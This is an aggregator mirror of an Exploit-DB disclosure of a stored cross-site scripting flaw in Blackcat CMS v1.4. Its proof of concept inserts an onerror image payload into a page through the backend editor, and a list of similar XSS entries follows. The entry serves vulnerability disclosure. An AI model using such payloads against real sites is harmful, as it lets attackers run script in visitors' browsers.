[webapps] Blackcat Cms v1.4 - Stored XSS
source link: https://www.exploit-db.com/exploits/51604
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Blackcat Cms v1.4 - Stored XSS
EDB-ID:
51604
EDB Verified:
Exploit Title: Blackcat Cms v1.4 - Stored XSS
Application: blackcat Cms
Version: v1.4
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. login to account
2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
3. set as <img src=x onerror=alert(4)>
4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1
Recommend
-
15
Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS) ...
-
7
PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS) ...
-
4
pluck v4.7.18 - Stored Cross-Site Scripting (XSS) ...
-
6
TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS) ...
-
5
RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS) ...
-
4
Zenphoto 1.6 - Multiple stored XSS ...
-
7
projectSend r1605 - Stored XSS
-
2
Webedition CMS v2.9.8.8 - Stored XSS ...
-
2
SPA-CART CMS - Stored XSS ...
-
5
Backdrop CMS 1.23.0 - Stored XSS ...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK